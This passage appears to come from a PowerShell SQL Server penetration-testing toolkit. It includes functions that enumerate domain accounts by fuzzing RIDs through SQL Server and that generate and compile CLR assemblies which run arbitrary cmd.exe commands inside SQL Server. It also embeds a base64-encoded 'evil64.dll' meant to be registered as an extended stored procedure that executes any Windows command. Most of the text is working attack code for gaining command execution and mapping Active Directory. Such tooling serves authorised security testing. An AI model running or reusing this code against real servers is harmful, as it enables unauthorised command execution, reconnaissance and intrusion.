-Domain TrustedDomainName .EXAMPLE PS C:\> Get-SQLFuzzDomainAccount -Instance SQLServer1\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Enumerating Domain accounts from the SQL Server's default domain... VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f4010000 (500) Resolved to: Domain\Administrator VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f5010000 (501) Resolved to: Domain\Guest VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f6010000 (502) Resolved to: Domain\krbtgt [TRUNCATED] ComputerName Instance DomainAccount ------------ -------- ------------- SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Administrator SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Guest SQLServer1 SQLServer1\STANDARDDEV2014 Domain\krbtgt SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Guests SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Computers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Controllers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cert Publishers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Schema Admins SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Enterprise Admins SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Group Policy Creator Owners SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Read-only Domain Controllers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cloneable Domain Controllers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Protected Users SQLServer1 SQLServer1\STANDARDDEV2014 Domain\RAS and IAS Servers SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Allowed RODC Password Replication Group SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Denied RODC Password Replication Group SQLServer1 SQLServer1\STANDARDDEV2014 Domain\HelpServicesGroup [TRUNCATED] SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyUser SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyDAUser SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyEAUser #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to start fuzzing with.')] [string]$StartId = 500, [Parameter(Mandatory = $false, HelpMessage = 'Principal ID to stop fuzzing on.')] [string]$EndId = 1000, [Parameter(Mandatory = $false, HelpMessage = 'Set a custom domain for user enumeration. Typically used to target trusted domains.')] [string]$Domain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblFuzzedAccounts = New-Object -TypeName System.Data.DataTable } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Grab server and domain information $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $ComputerName = $ServerInfo.ComputerName $Instance = $ServerInfo.Instance if(-not $Domain){ $Domain = $ServerInfo.DomainName } # Status the user Write-Verbose -Message "$Instance : Enumerating Active Directory accounts for the `"$Domain`" domain..." # Grab the domain SID $DomainGroup = "$Domain\Domain Admins" $DomainGroupSid = Get-SQLQuery -Instance $Instance -Query "select SUSER_SID('$DomainGroup') as DomainGroupSid" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $DomainGroupSidBytes = $DomainGroupSid | Select-Object -Property domaingroupsid -ExpandProperty domaingroupsid try{ $DomainGroupSidString = [System.BitConverter]::ToString($DomainGroupSidBytes).Replace('-','').Substring(0,48) }catch{ Write-Warning "The provided domain did not resolve correctly." return } # Fuzz the domain object SIDs from StartId to EndId $StartId..$EndId | ForEach-Object -Process { # Convert to Principal ID to hex $PrincipalIDHex = '{0:x}' -f $_ # Get number of characters $PrincipalIDHexPad1 = $PrincipalIDHex | Measure-Object -Character $PrincipalIDHexPad2 = $PrincipalIDHexPad1.Characters # Check if number is even and fix leading 0 if needed If([bool]($PrincipalIDHexPad2%2)) { $PrincipalIDHexFix = "0$PrincipalIDHex" } # Reverse the order of the hex $GroupsOfTwo = $PrincipalIDHexFix -split '(..)' | Where-Object -FilterScript { $_ } $GroupsOfTwoR = $GroupsOfTwo | Sort-Object -Descending $PrincipalIDHexFix2 = $GroupsOfTwoR -join '' # Pad to 8 bytes $PrincipalIDPad = $PrincipalIDHexFix2.PadRight(8,'0') # Create users rid $Rid = "0x$DomainGroupSidString$PrincipalIDPad" # Define Query $Query = "SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], '$Rid' as [RID], SUSER_SNAME($Rid) as [DomainAccount]" # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $DomainAccount = $TblResults.DomainAccount if($DomainAccount.length -ge 2) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: $DomainAccount" } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: " } } # Append results $TblFuzzedAccounts = $TblFuzzedAccounts + $TblResults } } End { # Return data $TblFuzzedAccounts | Select-Object -Property ComputerName, Instance, DomainAccount -Unique | Where-Object -FilterScript { $_.DomainAccount -notlike '' } } } # ------------------------------------------- # Function: Get-ComputerNameFromInstance # ------------------------------------------ # Author: Scott Sutherland Function Get-ComputerNameFromInstance { <# .SYNOPSIS Parses computer name from a provided instance. .PARAMETER Instance SQL Server instance to parse. .EXAMPLE PS C:\> Get-ComputerNameFromInstance -Instance SQLServer1\STANDARDDEV2014 SQLServer1 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance.')] [string]$Instance ) # Parse ComputerName from provided instance If ($Instance) { $ComputerName = $Instance.split('\')[0].split(',')[0] } else { $ComputerName = $env:COMPUTERNAME } Return $ComputerName } Function Get-SQLServiceLocal { <# .SYNOPSIS Returns local SQL Server services using Get-WmiObject -Class win32_service. This can only be run against the local server. .PARAMETER Instance SQL Server instance to filter for. .PARAMETER RunOnly Filter for running services. .EXAMPLE PS C:\> Get-SQLServiceLocal -Instance SQLServer1\SQL2014 | Format-Table -AutoSize .EXAMPLE PS C:\> Get-SQLServiceLocal | Format-Table -AutoSize ComputerName ServiceDisplayName ServiceName ServicePath ------------ ------------------ ----------- ----------- SQLServer1 SQL Server Integration Services 12.0 MsDtsServer120 "C:\Program Files\Microsoft SQL Server\120\DTS\Binn\MsDt... SQLServer1 SQL Server Analysis Services (STANDARDDEV2014) MSOLAP$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSAS12.STANDARDDE... SQLServer1 SQL Server (SQLEXPRESS) MSSQL$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... SQLServer1 SQL Server (STANDARDDEV2014) MSSQL$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... SQLServer1 SQL Full-text Filter Daemon Launcher (MSSQLSERVER) MSSQLFDLauncher "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... SQLServer1 SQL Full-text Filter Daemon Launcher (SQLEXPRESS) MSSQLFDLauncher$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... SQLServer1 SQL Full-text Filter Daemon Launcher (STANDARDDEV2014) MSSQLFDLauncher$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... SQLServer1 SQL Server (MSSQLSERVER) MSSQLSERVER "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... SQLServer1 SQL Server Analysis Services (MSSQLSERVER) MSSQLServerOLAPService "C:\Program Files\Microsoft SQL Server\MSAS12.MSSQLSERVE... SQLServer1 SQL Server Reporting Services (MSSQLSERVER) ReportServer "C:\Program Files\Microsoft SQL Server\MSRS12.MSSQLSERVE... SQLServer1 SQL Server Reporting Services (SQLEXPRESS) ReportServer$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSRS12.SQLEXPRESS... SQLServer1 SQL Server Reporting Services (STANDARDDEV2014) ReportServer$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSRS12.STANDARDDE... SQLServer1 SQL Server Distributed Replay Client SQL Server Distributed Replay Client "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... SQLServer1 SQL Server Distributed Replay Controller SQL Server Distributed Replay Controller "C:\Program Files (x86)\Microsoft SQL Server\120\Tools\D... SQLServer1 SQL Server Agent (SQLEXPRESS) SQLAgent$SQLEXPRESS "C:\Program Files\Microsoft SQL Server\MSSQL12.SQLEXPRES... SQLServer1 SQL Server Agent (STANDARDDEV2014) SQLAgent$STANDARDDEV2014 "C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDD... SQLServer1 SQL Server Browser SQLBrowser "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\s... SQLServer1 SQL Server Agent (MSSQLSERVER) SQLSERVERAGENT "C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERV... SQLServer1 SQL Server VSS Writer SQLWriter "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwrit... #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Filter for running services.')] [switch]$RunOnly, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblLocalInstances = New-Object -TypeName System.Data.DataTable $null = $TblLocalInstances.Columns.Add('ComputerName') $null = $TblLocalInstances.Columns.Add('Instance') $null = $TblLocalInstances.Columns.Add('ServiceDisplayName') $null = $TblLocalInstances.Columns.Add('ServiceName') $null = $TblLocalInstances.Columns.Add('ServicePath') $null = $TblLocalInstances.Columns.Add('ServiceAccount') $null = $TblLocalInstances.Columns.Add('ServiceState') $null = $TblLocalInstances.Columns.Add('ServiceProcessId') } Process { # Grab SQL Server services based on file path $SqlServices = Get-WmiObject -Class win32_service | Where-Object -FilterScript { $_.DisplayName -like 'SQL Server *' } | Select-Object -Property DisplayName, PathName, Name, StartName, State, SystemName, ProcessId # Add records to SQL Server instance table $SqlServices | ForEach-Object -Process { # Parse Instance $ComputerName = [string]$_.SystemName $DisplayName = [string]$_.DisplayName $ServState = [string]$_.State # Set instance to computername by default $CurrentInstance = $ComputerName # Check for named instance $InstanceCheck = ($DisplayName[1..$DisplayName.Length] | Where-Object {$_ -like '('}).count if($InstanceCheck) { # Set name instance $CurrentInstance = $ComputerName + '\' +$DisplayName.split('(')[1].split(')')[0] # Set default instance if($CurrentInstance -like '*\MSSQLSERVER') { $CurrentInstance = $ComputerName } } # If an instance is set filter out service that dont apply if($Instance -and $instance -notlike $CurrentInstance){ return } # Filter out services that arent runn if needed if($RunOnly -and $ServState -notlike 'Running'){ return } # Setup process id if($_.ProcessId -eq 0){ $ServiceProcessId = "" }else{ $ServiceProcessId = $_.ProcessId } # Add row $null = $TblLocalInstances.Rows.Add( [string]$_.SystemName, [string]$CurrentInstance, [string]$_.DisplayName, [string]$_.Name, [string]$_.PathName, [string]$_.StartName, [string]$_.State, [string]$ServiceProcessId) } } End { # Status User $LocalInstanceCount = $TblLocalInstances.rows.count if(-not $SuppressVerbose){ Write-Verbose "$LocalInstanceCount local SQL Server services were found that matched the criteria." } # Return data $TblLocalInstances } } # ------------------------------------------- # Function: Create-SQLFilCLRDLL # ------------------------------------------- # Author: Scott Sutherland # References: This was built of off work done by Lee Christensen (@tifkin_) and Nathan Kirk (@sekirkity). function Create-SQLFileCLRDll { <# .SYNOPSIS This script can be used to create a CLR DLL to execute OS commands through SQL Server. It provides the option to set a custom procedure name. By default, it will also create a file containing a "CREATE ASSEMBLY" TSQL command that can be used to create an assembly and function without requiring the DLL. Finally, an the function can be used to convert an existing CRL DLL ascii hex so it can be used to register the assembly without the DLL. .NOTES https://msdn.microsoft.com/en-us/library/microsoft.sqlserver.server.sqlpipe.sendresultsrow(v=vs.110).aspx http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ https://msdn.microsoft.com/en-us/library/ms254498(v=vs.110).aspx https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-assembly-transact-sql #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Procedure name.')] [string]$ProcedureName = "cmd_exec", [Parameter(Mandatory = $false, HelpMessage = 'Directory to output files.')] [string]$OutDir = $env:temp, [Parameter(Mandatory = $false, HelpMessage = 'Set custom assembly name. It is random by default.')] [string]$AssemblyName, [Parameter(Mandatory = $false, HelpMessage = 'Set custom assembly class name. It is random by default.')] [string]$AssemblyClassName, [Parameter(Mandatory = $false, HelpMessage = 'Set custom assembly method name. It is random by default.')] [string]$AssemblyMethodName, [Parameter(Mandatory = $false, HelpMessage = 'Output name.')] [string]$OutFile = "CLRFile", [Parameter(Mandatory = $false, HelpMessage = 'Optional source DLL to convert to ascii hex.')] [string]$SourceDllPath ) Begin { # ------------------------------------ # Setup File Paths # ------------------------------------ $SRCPath = $OutDir + '\' + $OutFile + '.csc' $DllPath = $OutDir + '\' + $OutFile + '.dll' $CommandPath = $OutDir + '\' + $OutFile + '.txt' # Change source DLL to existing DLL if provided if($SourceDllPath){ $DllPath = $SourceDllPath $SRCPath = "NA" } } Process { # Status the user Write-Verbose "Target C# File: $SRCPath" Write-Verbose "Target DLL File: $DllPath" # Get random length $ClassNameLength = (5..10 | Get-Random -count 1 ) $MethodNameLength = (5..10 | Get-Random -count 1 ) $AssemblyLength = (5..10 | Get-Random -count 1 ) # Create class name If(-not $AssemblyClassName){ $AssemblyClassName = (-join ((65..90) + (97..122) | Get-Random -Count $ClassNameLength | % {[char]$_})) } # Create method name if(-not $AssemblyMethodName){ $AssemblyMethodName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_})) } # Create assembly name If(-not $AssemblyName){ $AssemblyName = (-join ((65..90) + (97..122) | Get-Random -Count $MethodNameLength | % {[char]$_})) } if (-not $SourceDllPath){ # Create c# teamplate that will run any provided command # Based on template from http://sekirkity.com/seeclrly-fileless-sql-server-clr-based-custom-stored-procedure-command-execution/ $TemplateCmdExec = @" using System; using System.Data; using System.Data.SqlClient; using System.Data.SqlTypes; using Microsoft.SqlServer.Server; using System.IO; using System.Diagnostics; using System.Text; public partial class $AssemblyClassName { [Microsoft.SqlServer.Server.SqlProcedure] public static void $AssemblyMethodName (SqlString execCommand) { Process proc = new Process(); proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); // Create the record and specify the metadata for the columns. SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); // Mark the begining of the result-set. SqlContext.Pipe.SendResultsStart(record); // Set values for each column in the row record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); // Send the row back to the client. SqlContext.Pipe.SendResultsRow(record); // Mark the end of the result-set. SqlContext.Pipe.SendResultsEnd(); proc.WaitForExit(); proc.Close(); } }; "@ # Write out the cs code Write-Verbose "Writing C# code to $SRCPath" $TemplateCmdExec | Out-File $SRCPath # Identify csc path Write-Verbose "Searching for csc.exe..." $CSCPath = Get-ChildItem -Recurse "C:\Windows\Microsoft.NET\" -Filter "csc.exe" | Sort-Object fullname -Descending | Select-Object fullname -First 1 -ExpandProperty fullname if(-not $CSCPath){ Write-Output "No csc.exe found." return }else{ Write-Verbose "csc.exe found." } $CurrentDirectory = pwd cd $OutDir $Command = "$CSCPath /target:library " + $SRCPath # write-verbose "CSC Command: $Command" Write-Verbose "Compiling to dll..." $Results = Invoke-Expression $Command cd $CurrentDirectory } # Read and encode file Write-Verbose "Grabbing bytes from the dll" if (-not $SourceDllPath){ # write from default file $ProcedureNameSp = "$ProcedureName" $stringBuilder = New-Object -Type System.Text.StringBuilder $stringBuilder.Append("CREATE ASSEMBLY [") > $null $stringBuilder.Append($AssemblyName) > $null $stringBuilder.Append("] AUTHORIZATION [dbo] FROM `n0x") > $null $assemblyFile = resolve-path $DllPath $fileStream = [IO.File]::OpenRead($assemblyFile) while (($byte = $fileStream.ReadByte()) -gt -1) { $stringBuilder.Append($byte.ToString("X2")) > $null } $null = $stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") $null = $stringBuilder.AppendLine("GO") $null = $stringBuilder.AppendLine("CREATE PROCEDURE [dbo].[$ProcedureNameSp] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [$AssemblyName].[$AssemblyClassName].[$AssemblyMethodName];") $null = $stringBuilder.AppendLine("GO") $null = $stringBuilder.AppendLine("EXEC[dbo].[$ProcedureNameSp] 'whoami'") $null = $stringBuilder.AppendLine("GO") $MySQLCommand = $stringBuilder.ToString() -join "" $fileStream.Close() $fileStream.Dispose() }else{ # write from provided file $stringBuilder = New-Object -Type System.Text.StringBuilder $null = $stringBuilder.AppendLine("-- Change the assembly name to the one you want to replace") $null = $stringBuilder.AppendLine("ALTER ASSEMBLY [TBD] FROM") $null = $stringBuilder.Append("`n0x") $assemblyFile = resolve-path $DllPath $fileStream = [IO.File]::OpenRead($assemblyFile) while (($byte = $fileStream.ReadByte()) -gt -1) { $stringBuilder.Append($byte.ToString("X2")) > $null } $null = $stringBuilder.AppendLine("`nWITH PERMISSION_SET = UNSAFE") $null = $stringBuilder.Append("") $MySQLCommand = $stringBuilder.ToString() -join "" $fileStream.Close() $fileStream.Dispose() } # Generate SQL Command - note: this needs to be join together to work Write-Verbose "Writing SQL to: $CommandPath" $MySQLCommand | Out-File $CommandPath # Status user Write-Output "C# File: $SRCPath" Write-Output "CLR DLL: $DllPath" Write-Output "SQL Cmd: $CommandPath" } End { } } # ------------------------------------------- # Function: Create-SQLFileXpDll # ------------------------------------------- function Create-SQLFileXpDll { <# .SYNOPSIS This script can be used to generate a DLL file with an exported function that can be registered as an extended stored procedure in SQL Server. The exported function can be configured to run any Windows command. This script is intended to be used to test basic SQL Server audit controls around the sp_addextendedproc and sp_dropextendedproc stored procedures used to register and unregister extended stored procedures. .PARAMETER ExportName Name of the exported function that will be created. .PARAMETER Command Operating system command that the exported function will run. .PARAMETER OutFile Name of the Dll file to write to. .EXAMPLE PS C:\temp> Create-SQLFileXpDll -OutFile c:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test Creating DLL c:\temp\test.dll - Exported function name: xp_test - Exported function command: "echo test > c:\temp\test.txt" - DLL written - Manual test: rundll32 c:\temp\test.dll,xp_test SQL Server Notes The exported function can be registered as a SQL Server extended stored procedure. Options below: - Register xp via local disk: sp_addextendedproc 'xp_test', 'c:\temp\myxp.dll' - Register xp via UNC path: sp_addextendedproc 'xp_test', '\\servername\pathtofile\myxp.dll' - Unregister xp: sp_dropextendedproc 'xp_test' .LINK http://en.cppreference.com/w/cpp/utility/program/system http://www.netspi.com .NOTES The extended stored procedure template used to create the DLL shell was based on the following stackoverflow post: http://stackoverflow.com/questions/12749210/how-to-create-a-simple-dll-for-a-custom-sql-server-extended-stored-procedure Modified source code used to create the DLL can be found at the link below: https://github.com/nullbind/Powershellery/blob/master/Stable-ish/MSSQL/xp_evil_template.cpp The method used to patch the DLL was based on Will Schroeder (@HarmJ0y) "Invoke-PatchDll" function found in the PowerUp toolkit: https://github.com/HarmJ0y/PowerUp #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'Operating system command to run.')] [string]$Command, [Parameter(Mandatory = $false, HelpMessage = 'Name of exported function.')] [string]$ExportName, [Parameter(Mandatory = $false, HelpMessage = 'Dll file to write to.')] [string]$OutFile ) # ----------------------------------------------- # Define the DLL file and command to be executed # ----------------------------------------------- # This is the base64 encoded evil64.dll -command: base64 -w 0 evil64.dll > evil64.dll.b64 $DllBytes64 = 'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABh7MdDJY2pECWNqRAljakQkRFGECeNqRBL1qgRJo2pEEvWqhEnjakQS9asESmNqRBL1q0RL42pEPhyYhAnjakQJY2oEBaNqRD31qwRJo2pEPfWqREkjakQ99ZWECSNqRD31qsRJI2pEFJpY2gljakQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUEUAAGSGCgCqd/BWAAAAAAAAAADwACIgCwIOAAB0AAAAkgAAAAAAAK0SAQAAEAAAAAAAgAEAAAAAEAAAAAIAAAYAAAAAAAAABgAAAAAAAAAAcAIAAAQAAAAAAAACAGABAAAQAAAAAAAAEAAAAAAAAAAAEAAAAAAAABAAAAAAAAAAAAAAEAAAAADbAQCZAQAA6CICAFAAAAAAUAIAPAQAAADwAQCMHAAAAAAAAAAAAAAAYAIATAAAAHDIAQA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsMgBAJQAAAAAAAAAAAAAAAAgAgDoAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHRic3MAAAEAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAA4C50ZXh0AAAAX3MAAAAQAQAAdAAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAJlMAAAAkAEAAE4AAAB4AAAAAAAAAAAAAAAAAABAAABALmRhdGEAAADJCAAAAOABAAACAAAAxgAAAAAAAAAAAAAAAAAAQAAAwC5wZGF0YQAAiCAAAADwAQAAIgAAAMgAAAAAAAAAAAAAAAAAAEAAAEAuaWRhdGEAAOsLAAAAIAIAAAwAAADqAAAAAAAAAAAAAAAAAABAAABALmdmaWRzAAAqAQAAADACAAACAAAA9gAAAAAAAAAAAAAAAAAAQAAAQC4wMGNmZwAAGwEAAABAAgAAAgAAAPgAAAAAAAAAAAAAAAAAAEAAAEAucnNyYwAAADwEAAAAUAIAAAYAAAD6AAAAAAAAAAAAAAAAAABAAABALnJlbG9jAACvAQAAAGACAAACAAAAAAEAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMzMzMzM6U5CAADpMT4AAOl8EgAA6XcNAADpMkEAAOl9IQAA6dgtAADpwxwAAOkuGQAA6SkHAADpLkIAAOn/FAAA6aoYAADpNRUAAOkCQgAA6dsmAADpFikAAOnBKAAA6TwNAADpVwcAAOmCBQAA6R1CAADpiAwAAOkTFAAA6S4RAADpj0EAAOlUDQAA6dNBAADpWhEAAOnDQQAA6YANAADp+w0AAOmmPAAA6ZE7AADp7EEAAOkXFQAA6cJAAADpO0EAAOlILQAA6ftAAADprhUAAOmZOQAA6S5BAADp4UAAAOlOQQAA6WUYAADpSkEAAOlbDQAA6SJBAADpq0AAAOn8DAAA6dcXAADp4g0AAOm9DAAA6RZBAADpIx0AAOkOFgAA6QkgAADplEEAAOlVQAAA6QhAAADphUEAAOnAGgAA6R1AAADpHkAAAOlhQAAA6ZwVAADpFzMAAOlyFwAA6Q0GAADpkEAAAOljEQAA6dI/AADp/T8AAOmIQAAA6b9AAADpajoAAOn1FwAA6dAcAADpk0AAAOkGQQAA6aEdAADp1j8AAOnnFgAA6QIXAADpzRsAAOloOAAA6WVAAADpzkAAAOm5QAAA6RQcAADp30AAAOn6GgAA6RFAAADpoEAAAOnpPwAA6aZAAADpbT8AAOmsQAAA6e0/AADpghkAAOkNEAAA6cgOAADpQxEAAOmMPwAA6VlAAADp1BkAAOnRPwAA6UpAAADpZz8AAOloPwAA6TtAAADp9gMAAOkNQAAA6YwrAADpdw4AAOkCBQAA6V0LAADpaDkAAOkRPwAA6U5AAADpGQ8AAOnaPwAA6X9PAADpKiYAAOn1OgAA6VQ/AADpxT4AAOmGPwAA6VE/AADpXBAAAOkLPwAA6UIEAADp6T4AAOkIQAAA6ak+AADpjgoAAOnJPwAA6cQDAADp9T4AAOmKDgAA6Q8/AADp4AIAAOnnPgAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMxAVVdIgezIAAAASIvsSIv8uTIAAAC4zMzMzPOruAEAAABIjaXIAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhVV0iB7MgAAABIi+xIi/y5MgAAALjMzMzM86tIi4wk6AAAAEiNpcgAAABfXcPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMTIlEJBiJVCQQSIlMJAhVV0iB7NgAAABIi+xIi/y5NgAAALjMzMzM86tIi4wk+AAAAIuF+AAAAImFwAAAALgBAAAASI2l2AAAAF9dw8zMzMzMzMzMzMzMzMzMzMzMzMzMSIlMJAhVV0iB7AgBAABIjWwkIEiL/LlCAAAAuMzMzMzzq0iLjCQoAQAASI0Fb4EAAEiJRQhIi00I/xUZCwEAuAEAAABIjaXoAAAAX13DzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiNBQH7///DzMzMzMzMzMxIjQUL+v//w8zMzMzMzMzMSIPsOIA96ckAAAB1LUG5AQAAAMYF2skAAAFFM8DHRCQgAAAAADPSM8nolPj//0iLyEiDxDjpVfn//0iDxDjDzMzMzMzMzMzMzMzMzMzMzMxIg+w4QbkBAAAAx0QkIAEAAABFM8Az0jPJ6FT4//9Ig8Q4w8zMzMzMzMzMzMzMzMxMiUQkGIlUJBBIiUwkCEiD7DiLRCRIiUQkJIN8JCQAdCiDfCQkAXQQg3wkJAJ0OoN8JCQDdD3rRUiLVCRQSItMJEDoaQAAAOs5SIN8JFAAdAfGRCQgAesFxkQkIAAPtkwkIOjpAQAA6xnoH/j//w+2wOsP6Cn4//8PtsDrBbgBAAAASIPEOMPMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzEiJVCQQSIlMJAhIg+xIM8no2vn//w+2wIXAdQczwOkjAQAA6Dv5//+IRCQgxkQkIQGDPeDIAAAAdAq5BwAAA